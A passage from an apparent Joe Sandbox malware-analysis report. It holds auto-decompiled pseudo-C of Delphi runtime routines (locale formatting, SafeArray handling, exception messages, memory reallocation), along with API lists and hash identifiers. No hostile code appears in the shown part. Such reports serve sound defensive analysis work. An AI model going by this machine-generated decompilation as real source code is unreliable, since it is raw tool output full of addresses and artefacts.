                                                                                                  • Part of subcall function 02173B00: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,02173B71,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02173B55
                                                                                                  • Part of subcall function 02173B00: RegCloseKey.ADVAPI32(?,02173B78,00000000,?,00000004,00000000,02173B71,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02173B6B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: KeyboardType$CloseCommandCurrentLineOpenQueryThreadValue
                                                                                                • String ID: (4|
                                                                                                • API String ID: 3316616684-730202282
                                                                                                • Opcode ID: e5394358e98792127c9212b5976f6af5417249ef4ff760f89d05d2f6017d1b55
                                                                                                • Instruction ID: 0fa64292ceb727d782a7fe9e46e5cb04006a15c95765f084d37945afc5a090cb
                                                                                                • Opcode Fuzzy Hash: e5394358e98792127c9212b5976f6af5417249ef4ff760f89d05d2f6017d1b55
                                                                                                • Instruction Fuzzy Hash: FE41801548E3C26FC713AB7118A42967FB15E5321471E08CFC4C4DF1A3E61906AECB62
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 81%
                                                                                                			E0217ACF4(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                				intOrPtr _v8;
                                                                                                				char _v12;
                                                                                                				intOrPtr _v16;
                                                                                                				char _v20;
                                                                                                				char _v24;
                                                                                                				void* _t45;
                                                                                                				void* _t47;
                                                                                                				void* _t49;
                                                                                                				void* _t51;
                                                                                                				intOrPtr _t75;
                                                                                                				void* _t76;
                                                                                                				void* _t77;
                                                                                                				void* _t83;
                                                                                                				void* _t92;
                                                                                                				intOrPtr _t111;
                                                                                                				void* _t122;
                                                                                                				void* _t124;
                                                                                                				intOrPtr _t127;
                                                                                                				void* _t128;
                                                                                                
                                                                                                				_t128 = __eflags;
                                                                                                				_push(0);
                                                                                                				_push(0);
                                                                                                				_push(0);
                                                                                                				_push(0);
                                                                                                				_push(0);
                                                                                                				_t122 = __edx;
                                                                                                				_t124 = __eax;
                                                                                                				_push(_t127);
                                                                                                				_push(0x217aec4);
                                                                                                				_push( *[fs:eax]);
                                                                                                				 *[fs:eax] = _t127;
                                                                                                				_t92 = 1;
                                                                                                				E021748A0(__edx);
                                                                                                				E0217A9B8(GetThreadLocale(), 0x217aedc, 0x1009,  &_v12);
                                                                                                				if(E02177DC4(0x217aedc, 1, _t128) + 0xfffffffd - 3 < 0) {
                                                                                                					while(1) {
                                                                                                						__eflags = _t92 - E02174B60(_t124);
                                                                                                						if(__eflags > 0) {
                                                                                                							goto L28;
                                                                                                						}
                                                                                                						asm("bt [0x219082c], eax");
                                                                                                						if(__eflags >= 0) {
                                                                                                							_t45 = E02178328(_t124 + _t92 - 1, 2, 0x217aee0);
                                                                                                							__eflags = _t45;
                                                                                                							if(_t45 != 0) {
                                                                                                								_t47 = E02178328(_t124 + _t92 - 1, 4, 0x217aef0);
                                                                                                								__eflags = _t47;
                                                                                                								if(_t47 != 0) {
                                                                                                									_t49 = E02178328(_t124 + _t92 - 1, 2, 0x217af08);
                                                                                                									__eflags = _t49;
                                                                                                									if(_t49 != 0) {
                                                                                                										_t51 = ( *(_t124 + _t92 - 1) & 0x000000ff) - 0x59;
                                                                                                										__eflags = _t51;
                                                                                                										if(_t51 == 0) {
                                                                                                											L24:
                                                                                                											E02174B6C(_t122, 0x217af20);
                                                                                                										} else {
                                                                                                											__eflags = _t51 != 0x20;
                                                                                                											if(_t51 != 0x20) {
                                                                                                												E02174A88();
                                                                                                												E02174B6C(_t122, _v24);
                                                                                                											} else {
                                                                                                												goto L24;
                                                                                                											}
                                                                                                										}
                                                                                                									} else {
                                                                                                										E02174B6C(_t122, 0x217af14);
                                                                                                										_t92 = _t92 + 1;
                                                                                                									}
                                                                                                								} else {
                                                                                                									E02174B6C(_t122, 0x217af00);
                                                                                                									_t92 = _t92 + 3;
                                                                                                								}
                                                                                                							} else {
                                                                                                								E02174B6C(_t122, 0x217aeec);
                                                                                                								_t92 = _t92 + 1;
                                                                                                							}
                                                                                                							_t92 = _t92 + 1;
                                                                                                							__eflags = _t92;
                                                                                                						} else {
                                                                                                							_v8 = E0217BC90(_t124, _t92);
                                                                                                							E02174DC4(_t124, _v8, _t92,  &_v20);
                                                                                                							E02174B6C(_t122, _v20);
                                                                                                							_t92 = _t92 + _v8;
                                                                                                						}
                                                                                                					}
                                                                                                				} else {
                                                                                                					_t75 =  *0x21938c8; // 0x9
                                                                                                					_t76 = _t75 - 4;
                                                                                                					if(_t76 == 0 || _t76 + 0xfffffff3 - 2 < 0) {
                                                                                                						_t77 = 1;
                                                                                                					} else {
                                                                                                						_t77 = 0;
                                                                                                					}
                                                                                                					if(_t77 == 0) {
                                                                                                						E021748F4(_t122, _t124);
                                                                                                					} else {
                                                                                                						while(_t92 <= E02174B60(_t124)) {
                                                                                                							_t83 = ( *(_t124 + _t92 - 1) & 0x000000ff) - 0x47;
                                                                                                							__eflags = _t83;
                                                                                                							if(_t83 != 0) {
                                                                                                								__eflags = _t83 != 0x20;
                                                                                                								if(_t83 != 0x20) {
                                                                                                									E02174A88();
                                                                                                									E02174B6C(_t122, _v16);
                                                                                                								}
                                                                                                							}
                                                                                                							_t92 = _t92 + 1;
                                                                                                							__eflags = _t92;
                                                                                                						}
                                                                                                					}
                                                                                                				}
                                                                                                				L28:
                                                                                                				_pop(_t111);
                                                                                                				 *[fs:eax] = _t111;
                                                                                                				_push(E0217AECB);
                                                                                                				return E021748C4( &_v24, 4);
                                                                                                			}

                                                                                                APIs
                                                                                                • GetThreadLocale.KERNEL32(?,00000000,0217AEC4,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0217AD23
                                                                                                  • Part of subcall function 0217A9B8: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0217A9D6
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: Locale$InfoThread
                                                                                                • String ID: eeee$ggg$yyyy
                                                                                                • API String ID: 4232894706-1253427255
                                                                                                • Opcode ID: 1207b12d16293530110398d945feefb1edaf45b5436870a5071244552196341a
                                                                                                • Instruction ID: 6f46903783cf0e8b75e7581bd7a8d260f7fb2f663636b513299c2630acafa30d
                                                                                                • Opcode Fuzzy Hash: 1207b12d16293530110398d945feefb1edaf45b5436870a5071244552196341a
                                                                                                • Instruction Fuzzy Hash: 8741CF657C42048FD726AAB9C8906BFB3BBDFC5301B644426E4D1D7344DF35DE028A66
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E0217C620() {
                                                                                                				_Unknown_base(*)()* _t1;
                                                                                                				struct HINSTANCE__* _t3;
                                                                                                
                                                                                                				_t1 = GetModuleHandleA("kernel32.dll");
                                                                                                				_t3 = _t1;
                                                                                                				if(_t3 != 0) {
                                                                                                					_t1 = GetProcAddress(_t3, "GetDiskFreeSpaceExA");
                                                                                                					 *0x2190850 = _t1;
                                                                                                				}
                                                                                                				if( *0x2190850 == 0) {
                                                                                                					 *0x2190850 = E0217823C;
                                                                                                					return E0217823C;
                                                                                                				}
                                                                                                				return _t1;
                                                                                                			}

                                                                                                APIs
                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,?,0218F10B,00000000,0218F11E), ref: 0217C626
                                                                                                • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0217C637
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressHandleModuleProc
                                                                                                • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                                • API String ID: 1646373207-3712701948
                                                                                                • Opcode ID: b922c1d1e5d6224f07728f8b182afdc6eb8edc301e6c8a15381fbfeb02cf33e7
                                                                                                • Instruction ID: 5b2b17c64d7857b68b90af22e77f2fa6ee0761e69f7691d1f4545f0ddfe1b90d
                                                                                                • Opcode Fuzzy Hash: b922c1d1e5d6224f07728f8b182afdc6eb8edc301e6c8a15381fbfeb02cf33e7
                                                                                                • Instruction Fuzzy Hash: B2D0A7E0FD07C14EFB007BB464C461633F8E3E9601F20247AB00165700C77144508FC0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 82%
                                                                                                			E0217E33C(signed short* __eax) {
                                                                                                				char _v260;
                                                                                                				char _v768;
                                                                                                				char _v772;
                                                                                                				signed short* _v776;
                                                                                                				signed short* _v780;
                                                                                                				char _v784;
                                                                                                				signed int _v788;
                                                                                                				char _v792;
                                                                                                				intOrPtr* _v796;
                                                                                                				signed char _t43;
                                                                                                				intOrPtr* _t60;
                                                                                                				void* _t79;
                                                                                                				void* _t81;
                                                                                                				void* _t84;
                                                                                                				void* _t85;
                                                                                                				intOrPtr* _t92;
                                                                                                				void* _t96;
                                                                                                				char* _t97;
                                                                                                				void* _t98;
                                                                                                
                                                                                                				_v776 = __eax;
                                                                                                				if((_v776[0] & 0x00000020) == 0) {
                                                                                                					E0217E21C(0x80070057);
                                                                                                				}
                                                                                                				_t43 =  *_v776 & 0x0000ffff;
                                                                                                				if((_t43 & 0x00000fff) == 0xc) {
                                                                                                					if((_t43 & 0x00000040) == 0) {
                                                                                                						_v780 = _v776[4];
                                                                                                					} else {
                                                                                                						_v780 =  *(_v776[4]);
                                                                                                					}
                                                                                                					_v788 =  *_v780 & 0x0000ffff;
                                                                                                					_t79 = _v788 - 1;
                                                                                                					if(_t79 >= 0) {
                                                                                                						_t85 = _t79 + 1;
                                                                                                						_t96 = 0;
                                                                                                						_t97 =  &_v772;
                                                                                                						do {
                                                                                                							_v796 = _t97;
                                                                                                							_push(_v796 + 4);
                                                                                                							_t22 = _t96 + 1; // 0x1
                                                                                                							_push(_v780);
                                                                                                							L0217D43C();
                                                                                                							E0217E21C(_v780);
                                                                                                							_push( &_v784);
                                                                                                							_t25 = _t96 + 1; // 0x1
                                                                                                							_push(_v780);
                                                                                                							L0217D444();
                                                                                                							E0217E21C(_v780);
                                                                                                							 *_v796 = _v784 -  *((intOrPtr*)(_v796 + 4)) + 1;
                                                                                                							_t96 = _t96 + 1;
                                                                                                							_t97 = _t97 + 8;
                                                                                                							_t85 = _t85 - 1;
                                                                                                						} while (_t85 != 0);
                                                                                                					}
                                                                                                					_t81 = _v788 - 1;
                                                                                                					if(_t81 >= 0) {
                                                                                                						_t84 = _t81 + 1;
                                                                                                						_t60 =  &_v768;
                                                                                                						_t92 =  &_v260;
                                                                                                						do {
                                                                                                							 *_t92 =  *_t60;
                                                                                                							_t92 = _t92 + 4;
                                                                                                							_t60 = _t60 + 8;
                                                                                                							_t84 = _t84 - 1;
                                                                                                						} while (_t84 != 0);
                                                                                                						do {
                                                                                                							goto L12;
                                                                                                						} while (E0217E2E0(_t83, _t98) != 0);
                                                                                                						goto L15;
                                                                                                					}
                                                                                                					L12:
                                                                                                					_t83 = _v788 - 1;
                                                                                                					if(E0217E2B0(_v788 - 1, _t98) != 0) {
                                                                                                						_push( &_v792);
                                                                                                						_push( &_v260);
                                                                                                						_push(_v780);
                                                                                                						L0217D44C();
                                                                                                						E0217E21C(_v780);
                                                                                                						E0217E534(_v792);
                                                                                                					}
                                                                                                				}
                                                                                                				L15:
                                                                                                				_push(_v776);
                                                                                                				L0217CFD4();
                                                                                                				return E0217E21C(_v776);
                                                                                                			}























                                                                                                APIs
                                                                                                • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0217E3EB
                                                                                                • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0217E407
                                                                                                • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0217E47E
                                                                                                • VariantClear.OLEAUT32(?), ref: 0217E4A7
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                                                • String ID:
                                                                                                • API String ID: 920484758-0
                                                                                                • Opcode ID: 88686fe7731b7c03f03ace40aaed8d38b50d90d6747c96ad40a312f6e176089f
                                                                                                • Instruction ID: 293a81d05a08ee032b36b43e8c34f015822e88c96ea0f1babe323a7036c8cceb
                                                                                                • Opcode Fuzzy Hash: 88686fe7731b7c03f03ace40aaed8d38b50d90d6747c96ad40a312f6e176089f
                                                                                                • Instruction Fuzzy Hash: DB41F879A816299FCB66DB58C890BD9B3FDAF88314F0041E5E649E7211DB34AF808F54
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E0217AF30(intOrPtr* __eax, intOrPtr __ecx, void* __edx, void* __fp0, intOrPtr _a4) {
                                                                                                				intOrPtr _v8;
                                                                                                				intOrPtr _v12;
                                                                                                				char _v273;
                                                                                                				char _v534;
                                                                                                				char _v790;
                                                                                                				struct _MEMORY_BASIC_INFORMATION _v820;
                                                                                                				char _v824;
                                                                                                				intOrPtr _v828;
                                                                                                				char _v832;
                                                                                                				intOrPtr _v836;
                                                                                                				char _v840;
                                                                                                				intOrPtr _v844;
                                                                                                				char _v848;
                                                                                                				char* _v852;
                                                                                                				char _v856;
                                                                                                				char _v860;
                                                                                                				char _v1116;
                                                                                                				void* __edi;
                                                                                                				struct HINSTANCE__* _t40;
                                                                                                				intOrPtr _t51;
                                                                                                				struct HINSTANCE__* _t53;
                                                                                                				void* _t69;
                                                                                                				void* _t73;
                                                                                                				intOrPtr _t74;
                                                                                                				intOrPtr _t83;
                                                                                                				intOrPtr _t86;
                                                                                                				intOrPtr* _t87;
                                                                                                				void* _t93;
                                                                                                
                                                                                                				_t93 = __fp0;
                                                                                                				_v8 = __ecx;
                                                                                                				_t73 = __edx;
                                                                                                				_t87 = __eax;
                                                                                                				VirtualQuery(__edx,  &_v820, 0x1c);
                                                                                                				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
                                                                                                					_t40 =  *0x21937f0; // 0x2170000
                                                                                                					GetModuleFileNameA(_t40,  &_v534, 0x105);
                                                                                                					_v12 = E0217AF24(_t73);
                                                                                                				} else {
                                                                                                					_v12 = _t73 - _v820.AllocationBase;
                                                                                                				}
                                                                                                				E021782F4( &_v273, 0x104, E0217BDD8( &_v534, 0x5c) + 1);
                                                                                                				_t74 = 0x217b0b0;
                                                                                                				_t86 = 0x217b0b0;
                                                                                                				_t83 =  *0x2176d64; // 0x2176db0
                                                                                                				if(E02173DEC(_t87, _t83) != 0) {
                                                                                                					_t74 = E02174D64( *((intOrPtr*)(_t87 + 4)));
                                                                                                					_t69 = E021782CC(_t74, 0x217b0b0);
                                                                                                					if(_t69 != 0 &&  *((char*)(_t74 + _t69 - 1)) != 0x2e) {
                                                                                                						_t86 = 0x217b0b4;
                                                                                                					}
                                                                                                				}
                                                                                                				_t51 =  *0x2190edc; // 0x2176b4c
                                                                                                				_t16 = _t51 + 4; // 0xffe8
                                                                                                				_t53 =  *0x21937f0; // 0x2170000
                                                                                                				LoadStringA(E02175AF0(_t53),  *_t16,  &_v790, 0x100);
                                                                                                				E02173BD8( *_t87,  &_v1116);
                                                                                                				_v860 =  &_v1116;
                                                                                                				_v856 = 4;
                                                                                                				_v852 =  &_v273;
                                                                                                				_v848 = 6;
                                                                                                				_v844 = _v12;
                                                                                                				_v840 = 5;
                                                                                                				_v836 = _t74;
                                                                                                				_v832 = 6;
                                                                                                				_v828 = _t86;
                                                                                                				_v824 = 6;
                                                                                                				E02178814(_v8,  &_v790, _a4, _t93, 4,  &_v860);
                                                                                                				return E021782CC(_v8, _t86);
                                                                                                			}

                                                                                                APIs
                                                                                                • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0217AF4D
                                                                                                • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0217AF71
                                                                                                • GetModuleFileNameA.KERNEL32(02170000,?,00000105), ref: 0217AF8C
                                                                                                • LoadStringA.USER32 ref: 0217B022
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 3990497365-0
                                                                                                • Opcode ID: 6108ef19727310228bde5cc57720d9466eb8df8f82e1450db1ac7540bb5a38d0
                                                                                                • Instruction ID: b9ca34d134c60bb7a4262f7581425ed71a6dce5ac22a6afdb12e45792318efa6
                                                                                                • Opcode Fuzzy Hash: 6108ef19727310228bde5cc57720d9466eb8df8f82e1450db1ac7540bb5a38d0
                                                                                                • Instruction Fuzzy Hash: E1413A71A802589FCB21EB68CC84BDEB7FDAB98304F0440E6A548E7241DB759F88CF51
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E0217AF2E(intOrPtr* __eax, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
                                                                                                				intOrPtr _v8;
                                                                                                				intOrPtr _v12;
                                                                                                				char _v273;
                                                                                                				char _v534;
                                                                                                				char _v790;
                                                                                                				struct _MEMORY_BASIC_INFORMATION _v820;
                                                                                                				char _v824;
                                                                                                				intOrPtr _v828;
                                                                                                				char _v832;
                                                                                                				intOrPtr _v836;
                                                                                                				char _v840;
                                                                                                				intOrPtr _v844;
                                                                                                				char _v848;
                                                                                                				char* _v852;
                                                                                                				char _v856;
                                                                                                				char _v860;
                                                                                                				char _v1116;
                                                                                                				void* __edi;
                                                                                                				struct HINSTANCE__* _t40;
                                                                                                				intOrPtr _t51;
                                                                                                				struct HINSTANCE__* _t53;
                                                                                                				void* _t69;
                                                                                                				void* _t74;
                                                                                                				intOrPtr _t75;
                                                                                                				intOrPtr _t85;
                                                                                                				intOrPtr _t89;
                                                                                                				intOrPtr* _t92;
                                                                                                				void* _t105;
                                                                                                
                                                                                                				_v8 = __ecx;
                                                                                                				_t74 = __edx;
                                                                                                				_t92 = __eax;
                                                                                                				VirtualQuery(__edx,  &_v820, 0x1c);
                                                                                                				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
                                                                                                					_t40 =  *0x21937f0; // 0x2170000
                                                                                                					GetModuleFileNameA(_t40,  &_v534, 0x105);
                                                                                                					_v12 = E0217AF24(_t74);
                                                                                                				} else {
                                                                                                					_v12 = _t74 - _v820.AllocationBase;
                                                                                                				}
                                                                                                				E021782F4( &_v273, 0x104, E0217BDD8( &_v534, 0x5c) + 1);
                                                                                                				_t75 = 0x217b0b0;
                                                                                                				_t89 = 0x217b0b0;
                                                                                                				_t85 =  *0x2176d64; // 0x2176db0
                                                                                                				if(E02173DEC(_t92, _t85) != 0) {
                                                                                                					_t75 = E02174D64( *((intOrPtr*)(_t92 + 4)));
                                                                                                					_t69 = E021782CC(_t75, 0x217b0b0);
                                                                                                					if(_t69 != 0 &&  *((char*)(_t75 + _t69 - 1)) != 0x2e) {
                                                                                                						_t89 = 0x217b0b4;
                                                                                                					}
                                                                                                				}
                                                                                                				_t51 =  *0x2190edc; // 0x2176b4c
                                                                                                				_t16 = _t51 + 4; // 0xffe8
                                                                                                				_t53 =  *0x21937f0; // 0x2170000
                                                                                                				LoadStringA(E02175AF0(_t53),  *_t16,  &_v790, 0x100);
                                                                                                				E02173BD8( *_t92,  &_v1116);
                                                                                                				_v860 =  &_v1116;
                                                                                                				_v856 = 4;
                                                                                                				_v852 =  &_v273;
                                                                                                				_v848 = 6;
                                                                                                				_v844 = _v12;
                                                                                                				_v840 = 5;
                                                                                                				_v836 = _t75;
                                                                                                				_v832 = 6;
                                                                                                				_v828 = _t89;
                                                                                                				_v824 = 6;
                                                                                                				E02178814(_v8,  &_v790, _a4, _t105, 4,  &_v860);
                                                                                                				return E021782CC(_v8, _t89);
                                                                                                			}

                                                                                                APIs
                                                                                                • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0217AF4D
                                                                                                • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0217AF71
                                                                                                • GetModuleFileNameA.KERNEL32(02170000,?,00000105), ref: 0217AF8C
                                                                                                • LoadStringA.USER32 ref: 0217B022
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 3990497365-0
                                                                                                • Opcode ID: 1b7fb2f831dec41029b6cf2e85403a1c1cf1323977078b6de4dcc673a42a45bf
                                                                                                • Instruction ID: 3f9760125c316f916af196f8c2c2437dc1610c02d7abc950df4a39111049e7bb
                                                                                                • Opcode Fuzzy Hash: 1b7fb2f831dec41029b6cf2e85403a1c1cf1323977078b6de4dcc673a42a45bf
                                                                                                • Instruction Fuzzy Hash: 70414A71A802589FDB21EB68CC84BDEB7FDAB98304F0440E5A648E7241DB759F88CF51
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 93%
                                                                                                			E02171C9C(signed int __eax, signed int __edx, void* __edi) {
                                                                                                				signed int _t58;
                                                                                                				signed int _t73;
                                                                                                				signed int _t80;
                                                                                                				signed int _t86;
                                                                                                				signed int _t94;
                                                                                                				signed int _t100;
                                                                                                				void* _t102;
                                                                                                				signed int _t111;
                                                                                                				signed int _t119;
                                                                                                				signed int _t125;
                                                                                                				signed int _t131;
                                                                                                				signed int _t133;
                                                                                                				signed int _t136;
                                                                                                				intOrPtr _t139;
                                                                                                				void* _t141;
                                                                                                				signed int _t143;
                                                                                                				signed int _t145;
                                                                                                				unsigned int _t146;
                                                                                                				signed int _t153;
                                                                                                				unsigned int _t154;
                                                                                                				intOrPtr _t157;
                                                                                                				void* _t160;
                                                                                                				intOrPtr _t168;
                                                                                                				intOrPtr _t170;
                                                                                                				signed int _t173;
                                                                                                				signed int _t174;
                                                                                                				signed int _t175;
                                                                                                				void* _t182;
                                                                                                				unsigned int _t184;
                                                                                                				signed int _t190;
                                                                                                				signed int _t193;
                                                                                                				signed int _t195;
                                                                                                				signed int _t196;
                                                                                                				signed int _t198;
                                                                                                				void* _t202;
                                                                                                				signed int _t203;
                                                                                                				signed int _t204;
                                                                                                				void* _t205;
                                                                                                				signed int _t208;
                                                                                                
                                                                                                				_t181 = __edi;
                                                                                                				_t166 = __edx;
                                                                                                				_t145 =  *(__eax - 4);
                                                                                                				_t196 = __eax;
                                                                                                				if((_t145 & 0x00000007) != 0) {
                                                                                                					__eflags = _t145 & 0x00000005;
                                                                                                					if((_t145 & 0x00000005) != 0) {
                                                                                                						__eflags = _t145 & 0x00000003;
                                                                                                						if((_t145 & 0x00000003) != 0) {
                                                                                                							__eflags = 0;
                                                                                                							return 0;
                                                                                                						} else {
                                                                                                							_t146 = _t145 - 0x18;
                                                                                                							__eflags = __edx - _t146;
                                                                                                							if(__edx <= _t146) {
                                                                                                								__eflags = __edx - _t146 >> 1;
                                                                                                								if(__edx < _t146 >> 1) {
                                                                                                									_t131 = __edx;
                                                                                                									_t58 = E02171754(__edx);
                                                                                                									__eflags = _t58;
                                                                                                									if(_t58 == 0) {
                                                                                                										goto L61;
                                                                                                									} else {
                                                                                                										__eflags = _t131 - 0x40a2c;
                                                                                                										if(_t131 > 0x40a2c) {
                                                                                                											 *((intOrPtr*)(_t58 - 8)) = _t131;
                                                                                                										}
                                                                                                										E021714D4(_t196, _t131, _t58);
                                                                                                										E02171ABC(_t196, _t181);
                                                                                                										return _t58;
                                                                                                									}
                                                                                                								} else {
                                                                                                									 *((intOrPtr*)(__eax - 8)) = __edx;
                                                                                                									return __eax;
                                                                                                								}
                                                                                                							} else {
                                                                                                								asm("adc eax, 0xffffffff");
                                                                                                								_t133 = (0 & (_t146 >> 0x00000002) + _t146 - __edx) + __edx;
                                                                                                								_push(__edx);
                                                                                                								_t58 = E02171754((0 & (_t146 >> 0x00000002) + _t146 - __edx) + __edx);
                                                                                                								_pop(_t168);
                                                                                                								__eflags = _t58;
                                                                                                								if(_t58 != 0) {
                                                                                                									__eflags = _t133 - 0x40a2c;
                                                                                                									if(_t133 > 0x40a2c) {
                                                                                                										 *((intOrPtr*)(_t58 - 8)) = _t168;
                                                                                                									}
                                                                                                									E021714A4(_t196,  *((intOrPtr*)(_t196 - 8)), _t58);
                                                                                                									E02171ABC(_t196, _t181);
                                                                                                									return _t58;
                                                                                                								}
                                                                                                								L61:
                                                                                                								return _t58;
                                                                                                							}
                                                                                                						}
                                                                                                					} else {
                                                                                                						_t153 = _t145 & 0xfffffff0;
                                                                                                						_push(__edi);
                                                                                                						_t182 = _t153 + __eax;
                                                                                                						_t154 = _t153 - 4;
                                                                                                						_t136 = _t145 & 0x0000000f;
                                                                                                						__eflags = __edx - _t154;
                                                                                                						if(__edx > _t154) {
                                                                                                							_t73 =  *(_t182 - 4);
                                                                                                							__eflags = _t73 & 0x00000001;
                                                                                                							if((_t73 & 0x00000001) == 0) {
                                                                                                								L51:
                                                                                                								asm("adc edi, 0xffffffff");
                                                                                                								_t198 = ((_t154 >> 0x00000002) + _t154 - _t166 & 0) + _t166;
                                                                                                								_t184 = _t154;
                                                                                                								_t80 = E02171754(((_t154 >> 0x00000002) + _t154 - _t166 & 0) + _t166);
                                                                                                								_t170 = _t166;
                                                                                                								__eflags = _t80;
                                                                                                								if(_t80 == 0) {
                                                                                                									goto L49;
                                                                                                								} else {
                                                                                                									__eflags = _t198 - 0x40a2c;
                                                                                                									if(_t198 > 0x40a2c) {
                                                                                                										 *((intOrPtr*)(_t80 - 8)) = _t170;
                                                                                                									}
                                                                                                									E021714A4(_t196, _t184, _t80);
                                                                                                									E02171ABC(_t196, _t184);
                                                                                                									return _t80;
                                                                                                								}
                                                                                                							} else {
                                                                                                								_t86 = _t73 & 0xfffffff0;
                                                                                                								_t202 = _t154 + _t86;
                                                                                                								__eflags = __edx - _t202;
                                                                                                								if(__edx > _t202) {
                                                                                                									goto L51;
                                                                                                								} else {
                                                                                                									__eflags =  *0x2191045;
                                                                                                									if(__eflags == 0) {
                                                                                                										L42:
                                                                                                										__eflags = _t86 - 0xb30;
                                                                                                										if(_t86 >= 0xb30) {
                                                                                                											E021714F0(_t182);
                                                                                                											_t166 = _t166;
                                                                                                											_t154 = _t154;
                                                                                                										}
                                                                                                										asm("adc edi, 0xffffffff");
                                                                                                										_t94 = (_t166 + ((_t154 >> 0x00000002) + _t154 - _t166 & 0) + 0x000000d3 & 0xffffff00) + 0x30;
                                                                                                										_t173 = _t202 + 4 - _t94;
                                                                                                										__eflags = _t173;
                                                                                                										if(_t173 > 0) {
                                                                                                											 *(_t196 + _t202 - 4) = _t173;
                                                                                                											 *((intOrPtr*)(_t196 - 4 + _t94)) = _t173 + 3;
                                                                                                											_t203 = _t94;
                                                                                                											__eflags = _t173 - 0xb30;
                                                                                                											if(_t173 >= 0xb30) {
                                                                                                												__eflags = _t94 + _t196;
                                                                                                												E02171530(_t94 + _t196, _t154, _t173);
                                                                                                											}
                                                                                                										} else {
